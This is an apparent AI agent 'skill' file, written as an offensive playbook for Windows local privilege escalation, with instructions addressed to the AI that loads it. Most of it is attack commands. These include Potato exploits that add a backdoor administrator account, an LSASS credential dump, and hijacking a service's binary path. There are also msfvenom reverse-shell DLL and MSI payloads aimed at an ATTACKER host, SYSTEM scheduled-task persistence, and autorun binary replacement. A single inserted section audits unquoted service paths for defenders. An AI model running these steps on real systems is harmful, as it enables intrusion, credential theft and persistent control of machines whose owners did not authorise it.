windows-privilege-escalation

SKILL: Windows Local Privilege Escalation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Windows privesc techniques. Covers token manipulation, Potato family, service misconfigurations, DLL hijacking, AlwaysInstallElevated, scheduled task abuse, registry autoruns, and named pipe impersonation. Base models miss nuanced privilege prerequisites and OS-version-specific constraints.

0. RELATED ROUTING

Before going deep, consider loading:
  • windows-lateral-movement after escalation for pivoting to other hosts
  • windows-av-evasion when AV/EDR blocks your privesc tools
  • active-directory-kerberos-attacks when the host is domain-joined and you need AD-level escalation
  • active-directory-acl-abuse for domain privilege escalation via ACL misconfigurations

Advanced Reference

Also load TOKEN_POTATO_TRICKS.md when you need:
  • Detailed Potato family comparison (JuicyPotato → GodPotato evolution)
  • OS-version-specific exploit selection
  • Required privileges and protocol details per variant
Also load UAC_BYPASS_METHODS.md when you need:
  • UAC bypass technique matrix (fodhelper, eventvwr, sdclt, etc.)
  • Auto-elevate binary abuse
  • Mock trusted directory tricks

1. ENUMERATION CHECKLIST

System Context

```cmd
whoami /all                        & REM Current user, groups, privileges
systeminfo                         & REM OS version, hotfixes, architecture
hostname                           & REM Machine name
net user %USERNAME%                & REM Group memberships
```

Token Privileges (Critical)

```cmd
whoami /priv
```

| Privilege | Escalation Path |
|---|---|
| SeImpersonatePrivilege | Potato family exploits (§2) |
| SeAssignPrimaryTokenPrivilege | Token manipulation, Potato variants |
| SeDebugPrivilege | Dump LSASS, inject into SYSTEM processes |
| SeBackupPrivilege | Read any file (SAM/SYSTEM/NTDS.dit) |
| SeRestorePrivilege | Write any file (DLL hijack, service binary) |
| SeTakeOwnershipPrivilege | Take ownership of any object |
| SeLoadDriverPrivilege | Load vulnerable kernel driver → kernel exploit |

Services & Scheduled Tasks

```cmd
sc query state= all                & REM All services
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
schtasks /query /fo LIST /v        & REM Verbose scheduled task list
```

Installed Software & Patches

```cmd
wmic product get name,version      & REM Installed software (slow; triggers MSI consistency checks)
wmic qfe list                      & REM Installed patches
```

Network & Credentials

```cmd
netstat -ano                       & REM Listening ports + PIDs
cmdkey /list                       & REM Stored credentials
dir C:\Users\*\AppData\Local\Microsoft\Credentials\*   & REM DPAPI-protected credential blobs
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul   & REM Autologon settings
```

2. TOKEN MANIPULATION & POTATO EXPLOITS

SeImpersonatePrivilege Abuse

Service accounts (IIS AppPool, MSSQL, etc.) typically hold SeImpersonatePrivilege. This enables impersonation of any token presented to you.

| Tool | OS Support | Protocol | Notes |
|---|---|---|---|
| JuicyPotato | Win7–Server2016 | COM/DCOM | Requires valid CLSID; patched on Server2019+ |
| RoguePotato | Server2019+ | OXID resolver redirect | Needs controlled machine on port 135 |
| PrintSpoofer | Win10/Server2016-2019 | Named pipe via Print Spooler | Simple, fast; Spooler must run |
| SweetPotato | Broad | COM + Print + EFS | Combines multiple techniques |
| GodPotato | Win8–Server2022 | DCOM RPCSS | Works on latest patched systems |

```cmd
REM PrintSpoofer (simplest for modern systems)
PrintSpoofer64.exe -i -c "cmd /c whoami"

REM GodPotato (broadest compatibility)
GodPotato.exe -cmd "cmd /c net user hacker P@ss123 /add && net localgroup administrators hacker /add"

REM JuicyPotato (legacy systems)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * -c {CLSID}
```

SeDebugPrivilege Abuse

```powershell
# Dump LSASS (if SeDebugPrivilege is enabled)
procdump -ma lsass.exe lsass.dmp

# Or migrate into a SYSTEM process
# Meterpreter: migrate to winlogon.exe / services.exe
```

---

3. SERVICE MISCONFIGURATIONS

Unquoted Service Paths

```cmd
REM Find unquoted paths with spaces
REM (trailing backslash doubled so the closing quote is not escaped)
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
```

If path is `C:\Program Files\My App\service.exe`, Windows tries:
1. `C:\Program.exe`
2. `C:\Program Files\My.exe`
3. `C:\Program Files\My App\service.exe`

Place malicious binary at first writable location.
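
Added here as a defender-side check for the unquoted-path condition above, not code from the original playbook: a PowerShell audit that expands each unquoted service path into the candidate executables Windows would try (the `C:\Program.exe`, `C:\Program Files\My.exe` sequence) and flags any whose directory a standard user could write to. The function names are my own, and it assumes the executable portion of each path ends in `.exe`.

```powershell
# Added example (not from the original playbook): defender-side audit of unquoted
# service paths. Lists the intermediate paths Windows would try before the real
# binary and whether a standard user could plant a file there. Run elevated.
# Assumption: the executable portion of the path ends in ".exe".
function Get-UnquotedServicePathCandidates {
    param([Parameter(Mandatory)][string]$ImagePath)
    # Drop arguments after the executable, then split the executable at spaces.
    $exe   = ($ImagePath -split '(?<=\.exe)\s', 2)[0]
    $parts = $exe -split ' '
    $candidates = @()
    # e.g. C:\Program Files\My App\service.exe -> C:\Program.exe, C:\Program Files\My.exe
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-StandardUserCanCreateFile {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $lowPriv    = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    $createFile = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        # CreateFiles (WriteData) is the right needed to drop C:\Program.exe etc.
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights) -band $createFile) -ne 0) { return $true }
    }
    return $false
}

function Find-UnquotedServicePaths {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.TrimStart().StartsWith('"')) { continue }
        foreach ($candidate in @(Get-UnquotedServicePathCandidates -ImagePath $path)) {
            [pscustomobject]@{
                Service              = $svc.Name
                StartMode            = $svc.StartMode
                Candidate            = $candidate
                StandardUserCanWrite = Test-StandardUserCanCreateFile -Directory (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

# Report the exploitable ones; fix each by quoting ImagePath, e.g.
#   sc config <name> binPath= "\"C:\Program Files\My App\service.exe\""
Find-UnquotedServicePaths | Where-Object StandardUserCanWrite | Format-Table -AutoSize
```

Generic-rights ACEs are not mapped by the check, so a `$false` result means no explicit CreateFiles grant was found, not a proof that the directory is safe.
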

Weak Service Permissions

```cmd
REM Check service ACL with accesschk (Sysinternals)
accesschk64.exe -wuvc * /accepteula
REM Look for: SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS

REM Reconfigure service to run attacker binary
sc config vuln_svc binpath= "C:\temp\rev.exe"
sc stop vuln_svc
sc start vuln_svc
```

Writable Service Binaries

```cmd
REM Check if current user can write to the service binary path
icacls "C:\Program Files\VulnApp\service.exe"
REM (F) = Full, (M) = Modify, (W) = Write → replace binary
```


---

4. DLL HIJACKING

DLL Search Order (Standard)

  1. Directory of the executable
  2. C:\Windows\System32
  3. C:\Windows\System
  4. C:\Windows
  5. Current directory
  6. Directories in %PATH%

Exploitation

```cmd
REM Find missing DLLs (use Process Monitor)
REM Filter: Result=NAME NOT FOUND, Path ends with .dll

REM Compile malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll > evil.dll

REM Place in writable directory that comes before the real DLL location
```

Known Phantom DLL Targets

| Application | Missing DLL | Drop Location |
|---|---|---|
| Various .NET apps | profapi.dll | Application directory |
| Windows services | wlbsctrl.dll | %PATH% writable dir |
| Third-party updaters | VERSION.dll | Application directory |

5. ALWAYSINSTALLELEVATED

```cmd
REM Check both registry keys — BOTH must be set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

REM Generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi > evil.msi
msiexec /quiet /qn /i evil.msi
```

---

6. SCHEDULED TASK ABUSE

```cmd
REM Enumerate tasks with writable scripts or missing binaries
REM (findstr splits a plain search string on spaces; /C: keeps each phrase intact)
schtasks /query /fo LIST /v | findstr /i /C:"Task To Run" /C:"Run As User" /C:"Schedule Type"

REM Check permissions on task binary
icacls "C:\path\to\task\binary.exe"
REM If writable: replace binary, wait for task execution
REM If missing: place your binary at the expected path
```

Scheduled Task via PowerShell

```powershell
# If you can create tasks (unlikely from low priv, useful post-UAC-bypass)
$action  = New-ScheduledTaskAction -Execute "C:\temp\rev.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -TaskName "Updater" -Action $action -Trigger $trigger -User "SYSTEM"
```

---

7. REGISTRY AUTORUNS

```cmd
REM Check writable autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

REM Check permissions with accesschk (-k tells it the name is a registry key)
accesschk64.exe -kwvu "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /accepteula

REM If an autorun entry points to a writable path → replace binary or inject new entry.
```

---

8. NAMED PIPE IMPERSONATION

```powershell
# Service account creates a named pipe, tricks a SYSTEM process into connecting
# The connecting client's token is then impersonated
# PrintSpoofer leverages this with the Print Spooler:
PrintSpoofer64.exe -i -c powershell.exe

# Custom named pipe server (requires SeImpersonatePrivilege):
# Create pipe → coerce SYSTEM connection → ImpersonateNamedPipeClient() → SYSTEM token
```

---

9. AUTOMATED TOOLS

| Tool | Purpose | Command |
|---|---|---|
| winPEAS | Comprehensive Windows enumeration | `winPEASx64.exe` |
| PowerUp | Service/DLL/registry misconfig checks | `Invoke-AllChecks` |
| Seatbelt | Security-focused host survey | `Seatbelt.exe -group=all` |
| SharpUp | C# port of PowerUp checks | `SharpUp.exe audit` |
| PrivescCheck | PowerShell privesc checker | `Invoke-PrivescCheck` |
| BeRoot | Common misconfig finder | `beRoot.exe` |

10. PRIVILEGE ESCALATION DECISION TREE

```text
Low-privilege shell on Windows
├── whoami /priv → SeImpersonatePrivilege?
│   ├── Yes → Potato family (§2)
│   │   ├── Server2019+/Win11 → GodPotato or PrintSpoofer
│   │   ├── Server2016/Win10 → PrintSpoofer or SweetPotato
│   │   └── Older → JuicyPotato (need CLSID)
│   └── SeDebugPrivilege? → LSASS dump / process injection
├── Service misconfigurations?
│   ├── Unquoted path with spaces + writable dir? → binary plant (§3)
│   ├── SERVICE_CHANGE_CONFIG on service? → reconfigure binpath (§3)
│   └── Writable service binary? → replace executable (§3)
├── DLL hijacking opportunity?
│   ├── Missing DLL in search path? → plant malicious DLL (§4)
│   └── Writable directory in %PATH%? → DLL plant (§4)
├── AlwaysInstallElevated set?
│   └── Both HKLM+HKCU = 1 → MSI payload (§5)
├── Scheduled task abuse?
│   ├── Task runs as SYSTEM with writable binary? → replace (§6)
│   └── Task references missing binary? → plant binary (§6)
├── Registry autorun writable?
│   └── Writable binary path → replace on next login/reboot (§7)
├── UAC bypass needed? (medium integrity → high integrity)
│   └── Load UAC_BYPASS_METHODS.md
├── Stored credentials?
│   ├── cmdkey /list → runas /savecred
│   ├── Autologon in registry? → plaintext creds
│   └── WiFi passwords, browser creds, DPAPI
└── None of the above?
    ├── Run winPEAS for comprehensive scan
    ├── Check internal services (netstat -ano)
    ├── Look for sensitive files (unattend.xml, web.config, *.config)
    └── Check for kernel exploits (systeminfo → Windows Exploit Suggester)
```